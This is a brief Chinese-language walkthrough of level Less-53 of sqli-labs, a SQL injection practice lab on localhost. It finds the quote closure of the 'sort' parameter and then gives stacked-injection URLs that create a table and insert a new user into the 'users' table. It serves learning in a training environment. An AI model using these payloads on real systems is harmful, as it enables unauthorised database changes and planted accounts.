sqli-labs (less-53)
进入53关,输入sort=1
http://127.0.0.1/sql1/Less-53/?sort=1'
因为没有完整错误回显,所以这里我们只能一个一个去猜闭合方式
http://127.0.0.1/sql1/Less-53/?sort=1'--+
所以判断这里闭合方式为’–+,并且为字符型注入
因为这里没有完整错误回显,所以这里我们只能使用时间盲注,但是在本关中使用了mysgli multi guery()函数,而在less46-49关中使用了mysqL fetch_assoc()函数,所以这里我们也可以使用堆叠注入攻击,时间盲注的方法我在less-46已经详细讲过,这里就不介绍,这里我介绍堆叠注入攻击
创建一张表
http://127.0.0.1/sql1/Less-53/?sort=1';create table test like users; --+
创建一个新用户
http://127.0.0.1/sql1/Less-53/?sort=1';insert into users values(18,'icepeak','icepeak'); --+